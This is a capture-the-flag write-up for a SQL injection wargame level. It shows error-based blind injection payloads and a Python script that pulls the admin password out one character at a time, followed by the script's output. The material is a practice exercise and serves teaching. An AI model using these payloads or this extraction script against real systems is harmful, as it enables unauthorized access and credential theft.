We are provided with the SQL query:
SELECT id FROM prob_dark_eyes WHERE id='admin' AND pw='{$_GET[pw]}'
This challenge filters out the following:
This level also exits when an error is invoked instead of revealing the error message.
Error-based Blind SQL Injection
ERROR: Subquery returned more than 1 value error
In SQL the subquery can only return one value.
## Valid:
SELECT id FROM prob_dark_eyes WHERE id='admin' AND pw='' OR (SELECT 1) -- -'
## Invalid:
SELECT id FROM prob_dark_eyes WHERE id='admin' AND pw='' OR (SELECT 1 UNION SELECT 2) -- -'
This is the error that we will be exploiting.
Revealing the password length
If we provide the following URI parameter:
?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND length(pw)=1) -- -
The resultant query becomes:
SELECT id FROM prob_dark_eyes WHERE id='admin' AND pw='' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND length(pw)=1) -- -'
The above SQL query includes the subquery (SELECT 1 UNION SELECT 2 where id='admin' and length(pw)=1)
which returns two values if the length(pw)=1
for id='admin'
. This would invoke an error and cause the challenge to exit.
Since the challenge did not exit, it means that the subquery only returned one value SELECT 1
. This tells us that the length of the pw
for id='admin'
is more than 1.
If we keep increasing the length and provide the following URI parameter:
?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND length(pw)=8) -- -
The resultant query becomes:
SELECT id FROM prob_dark_eyes WHERE id='admin' AND pw='' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND length(pw)=8) -- -'
The subquery returned two values SELECT 1 UNION SELECT 2
because the length of pw
for id='admin'
is 8. This caused an error, causing the challenge to exit.
Leaking the password
Next, we can leak the password byte by byte using the substr()
If we provide the following URI parameter:
?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 1, 1)='0') -- -
The resultant query will be:
SELECT id FROM prob_dark_eyes WHERE id='admin' AND pw='' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 1, 1)='0') -- -'
Since the challenge did not exit, it means that the subquery only returned one value SELECT 1
. This tells us that the first character of the pw
for id='admin'
is not 0
We can try other characters moving up to the following:
?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 1, 1)='5') -- -
The resultant query will be:
SELECT id FROM prob_dark_eyes WHERE id='admin' AND pw='' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 1, 1)='5') -- -'
The subquery returned two values SELECT 1 UNION SELECT 2
because the first character of pw
for id='admin'
is ``5`. This caused an error, causing the challenge to exit.
We can keep repeating this process until we get all the eight characters of the admin
import requests
import urllib.parse
import string
cookies = {'PHPSESSID': 'rvrb7p6vumnf7hu5ukb8f70gj8'}
url = "https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php"
password_length = 0
for x in range(0, 100):
payload = f"' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND length(pw)={x}) -- -"
encoded_payload = urllib.parse.quote_plus(payload)
full_url = f"{url}?pw={encoded_payload}"
response = requests.get(full_url, cookies=cookies)
if "prob_dark_eyes" not in response.text:
password_length = x
print(f"[!] Payload: ?pw={payload}")
print(f"[!] Payload (URL encoded): ?pw={encoded_payload}")
print(f"[!] Password length: {password_length}")
password = ""
searchspace = string.digits + string.ascii_letters
for index in range(1, password_length + 1):
for char in searchspace:
payload = f"' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, {index}, 1)='{char}') -- -"
encoded_payload = urllib.parse.quote_plus(payload)
full_url = f"{url}?pw={encoded_payload}"
response = requests.get(full_url, cookies=cookies)
if "prob_dark_eyes" not in response.text:
password += char
print(f"[+] Payload: ?pw={payload}")
print(f"[+] Payload (URL encoded): ?pw={encoded_payload}")
print(f"[+] Character at index {index}: {char}")
print(f"[!] Extracted password: {password}")
print(f"[!] Final payload: ?pw={password}")
$ python .\dark_eyes_script.py
[!] Payload: ?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND length(pw)=8) -- -
[!] Payload (URL encoded): ?pw=%27+OR+%28SELECT+1+UNION+SELECT+2+WHERE+id%3D%27admin%27+AND+length%28pw%29%3D8%29+--+-
[!] Password length: 8
[+] Payload: ?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 1, 1)='5') -- -
[+] Payload (URL encoded): ?pw=%27+OR+%28SELECT+1+UNION+SELECT+2+WHERE+id%3D%27admin%27+AND+substr%28pw%2C+1%2C+1%29%3D%275%27%29+--+-
[+] Character at index 1: 5
[+] Payload: ?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 2, 1)='a') -- -
[+] Payload (URL encoded): ?pw=%27+OR+%28SELECT+1+UNION+SELECT+2+WHERE+id%3D%27admin%27+AND+substr%28pw%2C+2%2C+1%29%3D%27a%27%29+--+-
[+] Character at index 2: a
[+] Payload: ?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 3, 1)='2') -- -
[+] Payload (URL encoded): ?pw=%27+OR+%28SELECT+1+UNION+SELECT+2+WHERE+id%3D%27admin%27+AND+substr%28pw%2C+3%2C+1%29%3D%272%27%29+--+-
[+] Character at index 3: 2
[+] Payload: ?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 4, 1)='f') -- -
[+] Payload (URL encoded): ?pw=%27+OR+%28SELECT+1+UNION+SELECT+2+WHERE+id%3D%27admin%27+AND+substr%28pw%2C+4%2C+1%29%3D%27f%27%29+--+-
[+] Character at index 4: f
[+] Payload: ?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 5, 1)='5') -- -
[+] Payload (URL encoded): ?pw=%27+OR+%28SELECT+1+UNION+SELECT+2+WHERE+id%3D%27admin%27+AND+substr%28pw%2C+5%2C+1%29%3D%275%27%29+--+-
[+] Character at index 5: 5
[+] Payload: ?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 6, 1)='d') -- -
[+] Payload (URL encoded): ?pw=%27+OR+%28SELECT+1+UNION+SELECT+2+WHERE+id%3D%27admin%27+AND+substr%28pw%2C+6%2C+1%29%3D%27d%27%29+--+-
[+] Character at index 6: d
[+] Payload: ?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 7, 1)='3') -- -
[+] Payload (URL encoded): ?pw=%27+OR+%28SELECT+1+UNION+SELECT+2+WHERE+id%3D%27admin%27+AND+substr%28pw%2C+7%2C+1%29%3D%273%27%29+--+-
[+] Character at index 7: 3
[+] Payload: ?pw=' OR (SELECT 1 UNION SELECT 2 WHERE id='admin' AND substr(pw, 8, 1)='c') -- -
[+] Payload (URL encoded): ?pw=%27+OR+%28SELECT+1+UNION+SELECT+2+WHERE+id%3D%27admin%27+AND+substr%28pw%2C+8%2C+1%29%3D%27c%27%29+--+-
[+] Character at index 8: c
[!] Extracted password: 5a2f5d3c
[!] Final payload: ?pw=5a2f5d3c
If we provide the following URI parameter:
The resultant query becomes:
SELECT id FROM prob_dark_eyes WHERE id='admin' AND pw='5a2f5d3c'